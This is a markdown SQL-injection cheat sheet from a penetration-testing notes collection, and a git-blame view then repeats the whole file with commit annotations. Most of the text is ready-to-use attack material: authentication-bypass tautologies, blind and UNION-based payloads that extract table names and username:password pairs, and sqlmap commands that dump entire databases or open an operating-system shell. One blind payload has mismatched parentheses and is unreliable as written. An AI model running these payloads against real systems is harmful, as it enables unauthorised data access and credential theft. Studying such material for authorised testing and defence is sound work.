killchain-compendium/exploit/sqli/sqli.md

# SQL Injection

* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/)

## Finding an Opportunity
* GET parameter
```sh
http://example.com/index.php?id=' or 1=1 -- -
```
* Sometimes an ID or may come first
```sh
http://example.com/index.php?id=10 or 1=1 -- +
http://example.com/index.php?id=10' or '1'='1'-- -
http://example.com/index.php?id=-1' or 1=1 -- -&password=x
```
* Provoke error to gain information
```sh
http://example.com/index.php?id='
```
* **Incase of client side sanitization craft the URL instead of using the form!!!**

## Usage
* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
```sql
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
```

### Boolean True and False
```sql
SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
```

### Blind injection // Guessing characters
```sh
http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
```
```sh
http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
```
* Function substr(string, start, length)
* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` 

### Union based
* _First method__ check by order until error occurs
```sql
' order by 1 -- -
' order by 2 -- -
' order by 3 -- -
```
* __Second method__ fuzzing NULL values, followed by fuzzing data types
* Check number of cols
```sql
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# until the error occurs
```
* Check which one is a string
```sql
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
```
* Retrieve content, for cols and comment two times as an example. Or dump database
```sql
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
' UNION SELECT NULL,username,password,NULL FROM users -- //
```

* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)

### Identify Database 
```sh
id=sqlite_version()
id=@@version # mysql/mssql
id=(SELECT banner FROM v$version) # oracle
```

#### SQL Functions
* Use sql functions to fumble the tables & cols via union
* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
* Extract tables 
```sql
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
```
* sqlite specific
```sql
' UNION SELECT sql, sql FROM sqlite_master -- -
```
```sql
(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
```
* Extract cols
```sh
1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
```
* Data from cols
```sql
1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
```

## Tools
### SQLmap
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
* Use `-r` with a saved HTTP request 
```sh
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
```
* Select form data automatically
```sh
sqlmap -u http://<target-IP>/site.php --forms --dump-all
```


|Parameter|Details|
|-r|Uses the intercepted request save as a file|
|--dbms|DBMS of target|
|--dump|Dump the entire database|
|--dump-all|Dump everything|
|-p |TESTPARAMETER|
|--os-shell|Prompt for an interactive operating system shell|
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|

### Damn Small SQLi Scanner (DSSS)
* [Script](https://github.com/stamparm/DSSS.git)
```sh
python dsss.py -u "http://example.com/index.php?id="
```

### Online sqlmap
* [Link](https://suip.biz/?act=sqlmap)

## Payloads
* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)
second commit 2021-08-23 01:13:54 +02:00			`# SQL Injection`

bump 2021-09-08 02:09:14 +02:00			`* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/)`

			`## Finding an Opportunity`
second commit 2021-08-23 01:13:54 +02:00			`* GET parameter`
			```sh
			`http://example.com/index.php?id=' or 1=1 -- -`
			```
bump 2021-09-08 02:09:14 +02:00			`* Sometimes an ID or may come first`
			```sh
			`http://example.com/index.php?id=10 or 1=1 -- +`
			`http://example.com/index.php?id=10' or '1'='1'-- -`
			`http://example.com/index.php?id=-1' or 1=1 -- -&password=x`
			```
second commit 2021-08-23 01:13:54 +02:00			`* Provoke error to gain information`
			```sh
			`http://example.com/index.php?id='`
			```
bump 2021-09-08 02:09:14 +02:00			`* Incase of client side sanitization craft the URL instead of using the form!!!`
second commit 2021-08-23 01:13:54 +02:00
bump 2021-09-08 02:09:14 +02:00			`## Usage`
second commit 2021-08-23 01:13:54 +02:00			* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
			```sql
			`SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -`
			`SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+`
			```

bump 2021-09-08 02:09:14 +02:00			`### Boolean True and False`
second commit 2021-08-23 01:13:54 +02:00			```sql
			`SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+`
			`SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+`
			```

bump 2021-09-08 02:09:14 +02:00			`### Blind injection // Guessing characters`
second commit 2021-08-23 01:13:54 +02:00			```sh
added stuff 2021-09-24 00:54:18 +02:00			`http://example.com/?id=1' and substr((select database()),1,1) < 105 --+`
			```
			```sh
			`http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+`
second commit 2021-08-23 01:13:54 +02:00			```
bump 2021-09-08 02:09:14 +02:00			`* Function substr(string, start, length)`
			* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump`
second commit 2021-08-23 01:13:54 +02:00
			`### Union based`
added stuff 2021-09-24 00:54:18 +02:00			`* _First method__ check by order until error occurs`
			```sql
			`' order by 1 -- -`
			`' order by 2 -- -`
			`' order by 3 -- -`
			```
			`* __Second method__ fuzzing NULL values, followed by fuzzing data types`
second commit 2021-08-23 01:13:54 +02:00			`* Check number of cols`
			```sql
			`' UNION SELECT NULL--`
			`' UNION SELECT NULL,NULL--`
			`' UNION SELECT NULL,NULL,NULL--`
			`# until the error occurs`
			```
			`* Check which one is a string`
			```sql
			`' UNION SELECT 'a',NULL,NULL,NULL--`
			`' UNION SELECT NULL,'a',NULL,NULL--`
			`' UNION SELECT NULL,NULL,'a',NULL--`
			`' UNION SELECT NULL,NULL,NULL,'a'--`
			```
			`* Retrieve content, for cols and comment two times as an example. Or dump database`
			```sql
			`' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //`
			`' UNION SELECT NULL,username,password,NULL FROM users -- //`
			```

			`* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)`

bump 2021-09-08 02:09:14 +02:00			`### Identify Database`
			```sh
			`id=sqlite_version()`
			`id=@@version # mysql/mssql`
			`id=(SELECT banner FROM v$version) # oracle`
			```

added sql union via functions 2021-09-02 01:19:53 +02:00			`#### SQL Functions`
			`* Use sql functions to fumble the tables & cols via union`
			`* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)`
			`* Extract tables`
			```sql
			`1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -`
			```
bump 2021-09-08 02:09:14 +02:00			`* sqlite specific`
			```sql
added stuff 2021-09-24 00:54:18 +02:00			`' UNION SELECT sql, sql FROM sqlite_master -- -`
			```
			```sql
bump 2021-09-08 02:09:14 +02:00			`(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')`
			`(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')`
			```
added sql union via functions 2021-09-02 01:19:53 +02:00			`* Extract cols`
			```sh
			`1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -`
			```
			`* Data from cols`
			```sql
			`1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -`
			```

second commit 2021-08-23 01:13:54 +02:00			`## Tools`
			`### SQLmap`
			`* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)`
			`* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)`
			`* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)`
			* Use `-r` with a saved HTTP request
			```sh
			`sqlmap -r request.txt --dbms=mysql --dump`
			`sqlmap -r request.txt --batch`
			```
bump 2021-09-08 02:09:14 +02:00			`* Select form data automatically`
			```sh
			`sqlmap -u http://<target-IP>/site.php --forms --dump-all`
			```
second commit 2021-08-23 01:13:54 +02:00

			`\|Parameter\|Details\|`
			`\|-r\|Uses the intercepted request save as a file\|`
			`\|--dbms\|DBMS of target\|`
			`\|--dump\|Dump the entire database\|`
			`\|--dump-all\|Dump everything\|`
			`\|-p \|TESTPARAMETER\|`
			`\|--os-shell\|Prompt for an interactive operating system shell\|`
			`\|--os-pwn\|Prompt for an OOB shell, Meterpreter or VNC\|`

			`### Damn Small SQLi Scanner (DSSS)`
			`* [Script](https://github.com/stamparm/DSSS.git)`
			```sh
			`python dsss.py -u "http://example.com/index.php?id="`
			```

			`### Online sqlmap`
			`* [Link](https://suip.biz/?act=sqlmap)`

			`## Payloads`
			`* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)`